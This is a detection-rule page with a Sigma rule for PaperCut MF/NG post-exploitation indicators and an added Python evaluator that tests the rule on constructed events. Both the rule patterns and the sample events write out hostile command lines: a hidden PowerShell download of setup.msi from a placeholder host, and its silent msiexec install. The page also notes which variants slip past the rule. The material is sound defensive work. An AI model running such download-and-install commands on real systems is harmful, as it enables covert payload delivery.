PaperCut MF/NG Exploitation Related Indicators
Detects process-creation indicators seen in the post-exploitation phase of the PaperCut MF/NG attacks documented in the rule's references: a hidden PowerShell download of setup.msi via Invoke-WebRequest wrapped in cmd /c, followed by a silent msiexec install of that package carrying one specific IntegratorLogin value. Both selections are campaign-specific indicators, not a generic detection of the PaperCut vulnerabilities themselves.
Sigma rule (View on GitHub)
```yaml
title: PaperCut MF/NG Exploitation Related Indicators
id: de1bd0b6-6d59-417c-86d9-a44114aede3b
status: test
description: Detects exploitation indicators related to PaperCut MF/NG Exploitation
references:
    - https://www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software
    - https://www.papercut.com/kb/Main/PO-1216-and-PO-1219
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-04-25
tags:
    - attack.execution
    - detection.emerging-threats
logsource:
    category: process_creation
    product: windows
detection:
    selection_1:
        CommandLine|contains|all:
            - ' /c '
            - 'powershell'
            - '-nop -w hidden'
            - 'Invoke-WebRequest'
            - 'setup.msi'
            - '-OutFile'
    selection_2:
        CommandLine|contains|all:
            - 'msiexec '
            - '/i '
            - 'setup.msi '
            - '/qn '
            - 'IntegratorLogin=fimaribahundq'
    condition: 1 of selection_*
falsepositives:
    - Unlikely
level: high
```
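To see how the two selections and the `1 of selection_*` condition behave on real-looking telemetry, here is an added example (it is not part of the Sigma rule, SigmaHQ or the referenced reports): a small Python evaluator that applies the rule's `contains|all` needle lists to constructed process_creation events. The URL, file paths and the alternative IntegratorLogin value in the samples are placeholders, and the evaluator assumes Sigma's default case-insensitive string matching.

```python
# Added example (not part of the Sigma rule or of SigmaHQ): a minimal evaluator
# for the rule's two selections, run over constructed process_creation events.
# Constructed inputs only; the URL, file paths and the alternative
# IntegratorLogin value are placeholders, not observed indicators.
from typing import Iterable

# Needle lists copied from the rule body. Sigma's 'contains' modifier is
# case-insensitive by default, so every comparison is done on lower-cased text.
SELECTION_1 = (" /c ", "powershell", "-nop -w hidden", "Invoke-WebRequest", "setup.msi", "-OutFile")
SELECTION_2 = ("msiexec ", "/i ", "setup.msi ", "/qn ", "IntegratorLogin=fimaribahundq")
SELECTIONS = {"selection_1": SELECTION_1, "selection_2": SELECTION_2}


def contains_all(command_line: str, needles: Iterable[str]) -> bool:
    """Sigma 'contains|all': every needle must appear somewhere in the field."""
    haystack = command_line.lower()
    return all(needle.lower() in haystack for needle in needles)


def matched_selections(command_line: str) -> list[str]:
    """Names of the selections whose needle list is fully present."""
    return [name for name, needles in SELECTIONS.items() if contains_all(command_line, needles)]


def rule_fires(command_line: str) -> bool:
    """condition: 1 of selection_*  ->  any single selection matching is enough."""
    return bool(matched_selections(command_line))


# Constructed sample events (not real telemetry). Only the CommandLine field is
# evaluated, mirroring the rule's logsource/field choice.
SAMPLE_EVENTS = [
    {   # stage 1 of the chain: cmd /c wrapping a hidden PowerShell download
        "id": "download",
        "CommandLine": 'cmd.exe /c powershell.exe -nop -w hidden -c "Invoke-WebRequest http://example.invalid/setup.msi -OutFile C:\\Windows\\Temp\\setup.msi"',
    },
    {   # stage 2: silent MSI install with the hard-coded IntegratorLogin value
        "id": "install",
        "CommandLine": "msiexec /i C:\\Windows\\Temp\\setup.msi /qn IntegratorLogin=fimaribahundq",
    },
    {   # benign: same silent-install shape, different package, no IntegratorLogin
        "id": "benign_msi",
        "CommandLine": "msiexec /i C:\\Temp\\Agent.msi /qn",
    },
    {   # caveat: identical installer invocation with a different account value evades selection_2
        "id": "other_account",
        "CommandLine": "msiexec /i setup.msi /qn IntegratorLogin=placeholder-value",
    },
    {   # caveat: the same download without the cmd /c wrapper lacks ' /c ' and evades selection_1
        "id": "no_cmd_wrapper",
        "CommandLine": 'powershell.exe -nop -w hidden -c "Invoke-WebRequest http://example.invalid/setup.msi -OutFile setup.msi"',
    },
]


def run_rule(events: list[dict]) -> dict[str, list[str]]:
    """Evaluate every event; returns {event id: matched selection names}."""
    return {event["id"]: matched_selections(event["CommandLine"]) for event in events}


if __name__ == "__main__":
    for event_id, hits in run_rule(SAMPLE_EVENTS).items():
        verdict = "ALERT" if hits else "no match"
        print(f"{event_id:16s} {verdict:9s} {hits}")
```

The two "caveat" events are the practical point: selection_2 is pinned to a single IntegratorLogin value, so the same installer run with any other account value is not matched, and selection_1 only fires when the PowerShell download is wrapped in `cmd /c` (the `-c` switch of powershell.exe does not contain ` /c `). Treat the rule as an indicator match for the reported campaign and pair it with broader rules for hidden-window PowerShell downloads and silent msiexec installs from user-writable paths. If your SIEM backend converts `contains` to a case-sensitive match, the conversion must add the case-folding this evaluator performs.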
Related rules
- APT29 2018 Phishing Campaign CommandLine Indicators
- Adwind RAT / JRAT
- Blue Mockingbird
- CVE-2021-1675 Print Spooler Exploitation
- CVE-2021-1675 Print Spooler Exploitation IPC Access